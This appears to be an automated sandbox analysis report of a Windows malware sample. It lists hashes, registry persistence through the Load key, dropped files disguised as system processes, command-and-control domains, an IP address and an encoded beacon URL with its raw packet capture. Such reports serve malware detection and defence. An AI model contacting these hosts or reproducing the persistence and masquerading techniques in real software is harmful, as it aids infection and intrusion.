Analysis Date: 2014-06-20 13:08:26
MD5: d8c835166e9c30fa4af93810e4bc916e
SHA1: df7d06e3fe10047f406e766aad5c31a5d4f06a3a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section .text md5: f49fc584b9ff412fd54ff21ed1450bbb sha1: 98734e1bd95626ecb594b8d10ab7d09caf10c09b size: 169984
Section .rdata md5: 1d4ef944864a7c67e8154731a97d0cbb sha1: 5a8d47fd044fa20c4c034200a1697d1003c41e3b size: 2048
Section .data md5: 4e96f993467a5534f7fba646479b8647 sha1: d851eb297002b1f2a8dc3d5864b561a1db8c235f size: 26112
Section .tls md5: 75ca60194559df6860eaa57a6c3ec4ec sha1: a0f7da148c70f4a0db9defd7d2c5ac6d1abb93a7 size: 512
Timestamp: 2005-09-19 19:17:10
Version: PrivateBuild: 1519
PEhash: cba6338cfcd6f5ae949a49d43988d192dcc100fb
IMPhash: 404f4cf283877896de14dd02de62ad2e

Runtime Details:


Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: pdasoftstorage.com
Winsock DNS: 127.0.0.1
Winsock DNS: supportminidevices.com
Winsock DNS: onlineinstitute.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: onlineinstitute.com
Type: A
67.227.195.200
DNS: supportminidevices.com
Type: A
DNS: pdasoftstorage.com
Type: A
HTTP GET: http://onlineinstitute.com/g7/images/logo2.jpg?v85=96&tq=gKZEtzypLUdGxpClnTpKuYJZsZSad155FqPRp9Zp%2Bdc%2FiD3FKc1q8qja%2BofIOsyrTSgGUX9toDBFtLfL91TYe96j54nHO3zGluUPIVy8vP2f8Kj%2Bompc%2BZ36HSSeFckTjGWxtBgf9JgV1Hqn03g%2FCGCpO%2BHWbksZ2hM2rhxc45qwCMdMHvfIULC44Du14XzhEJelq%2BL9Km53Kfk3KXP%2Fbx
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 67.227.195.200:80

Raw Pcap
0x00000000 (00000)   47455420 2f67372f 696d6167 65732f6c   GET /g7/images/l
0x00000010 (00016)   6f676f32 2e6a7067 3f763835 3d393626   ogo2.jpg?v85=96&
0x00000020 (00032)   74713d67 4b5a4574 7a79704c 55644778   tq=gKZEtzypLUdGx
0x00000030 (00048)   70436c6e 54704b75 594a5a73 5a536164   pClnTpKuYJZsZSad
0x00000040 (00064)   31353546 71505270 395a7025 32426463   155FqPRp9Zp%2Bdc
0x00000050 (00080)   25324669 4433464b 63317138 716a6125   %2FiD3FKc1q8qja%
0x00000060 (00096)   32426f66 494f7379 72545367 47555839   2BofIOsyrTSgGUX9
0x00000070 (00112)   746f4442 46744c66 4c393154 59653936   toDBFtLfL91TYe96
0x00000080 (00128)   6a35346e 484f337a 476c7555 50495679   j54nHO3zGluUPIVy
0x00000090 (00144)   38765032 66384b6a 2532426f 6d706325   8vP2f8Kj%2Bompc%
0x000000a0 (00160)   32425a33 36485353 6546636b 546a4757   2BZ36HSSeFckTjGW
0x000000b0 (00176)   78744267 66394a67 56314871 6e303367   xtBgf9JgV1Hqn03g
0x000000c0 (00192)   25324643 4743704f 25324248 57626b73   %2FCGCpO%2BHWbks
0x000000d0 (00208)   5a32684d 32726878 63343571 77434d64   Z2hM2rhxc45qwCMd
0x000000e0 (00224)   4d487666 49554c43 34344475 3134587a   MHvfIULC44Du14Xz
0x000000f0 (00240)   68454a65 6c712532 424c394b 6d35334b   hEJelq%2BL9Km53K
0x00000100 (00256)   666b334b 58502532 46627820 48545450   fk3KXP%2Fbx HTTP
0x00000110 (00272)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x00000120 (00288)   3a20636c 6f73650d 0a486f73 743a206f   : close..Host: o
0x00000130 (00304)   6e6c696e 65696e73 74697475 74652e63   nlineinstitute.c
0x00000140 (00320)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000150 (00336)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000160 (00352)   696c6c61 2f322e30 0d0a0d0a            illa/2.0....


Strings
.
..
T..e
.....s....
.....
.
9.D.vU
.
.
.jLd..d
.,
c[.K.
g..
.h3#.U...,
.PI
$Z.E..
t
{Qu..|....
.B
,IW..D.Ba..PO5o..U4yY.
..r..
....#.4 ..N...\=..
.:.V~iU;.
p.
..
O
9.S.PL..'..(.

040904b0
1519
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
2Qs)1UP
4{]9jKl.
4`dg~i
<:,4LJz
?(59M*
\6t{zk
_|6wOX
.7<3{?c
7M>{KS/
|/=81S
?8)TKQ
9l{fKx8
9|U:/)p
[AD9p4
BeginPaint
BMq4N-#
}c8,<K
CallWindowProcA
CharNextA
c#H?wM
CM_Get_DevNode_Status
CMP_WaitNoPendingInstallEvents
CreateFiber
CreateWindowExA
cwI/C?y
d3Mhx~
@.data
DefWindowProcA
DestroyWindow
d L|n~
e}7w'9
EndPaint
EnumResourceNamesA
EqualRect
ExitProcess
GetACP
GetClassInfoExA
GetClientRect
GetCommandLineA
GetFocus
GetKeyState
GetLocaleInfoA
GetParent
GetProcAddress
GetSystemInfo
GetWindowLongA
GnbXo^{(
HeapAlloc
HeapCreate
HeapDestroy
HeapReAlloc
HeapSize
h"*k|ZFOj
HT<+Cm
&Ih P#z
ImYB3~
InterlockedCompareExchange
IntersectRect
InvalidateRect
IsChild
IsDebuggerPresent
IsProcessorFeaturePresent
IsWindow
iuWWLv
 IY||z
JAIkD0n
|JM;YD
)[JpY/
:&Kd;h
KERNEL32.dll
K_j;?9j
l4edr2
l&}5	9
~leR\B
{=LlgGX{
LoadCursorA
LoadLibraryA
m_*\3C
+mI[YS
Mkt=t$
[.m;Ljp
o9'OGV
OffsetRect
O+<ywy 
P7w8YU
PJ>f%i
PtInRect
q8CR=	
+qSivHw&
(%R+Af
`.rdata
RealGetWindowClassA
RegisterClassExA
ReleaseDC
Rich`x
R^~p4H
RtlUnwind
SetFocus
SetThreadPriority
SetUnhandledExceptionFilter
SETUPAPI.dll
SetupDiGetDeviceRegistryPropertyW
SetWindowLongA
SetWindowPos
SetWindowRgn
ShowWindow
~snE4K
SuspendThread
}T9<v+
TerminateProcess
!This program cannot be run in DOS mode.
U+;kZF
UnhandledExceptionFilter
UnionRect
UnregisterClassA
u+r&l$;
USER32.dll
US*~<PD,
;:*U<U
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
_Vx]n\
:w|(\c
wH~V5A
W_K6V_
^W(/MB
WriteFile
w+rkm>H
wsprintfA
WvVhKM
{X]aU*]
xvkHPF
;:)`y*\
=Y5yJN
yJ:O%>
@yn(6'8
ypr:Bu
\YTZt#
z)`J6#!
)Z^O}z
zZJOJo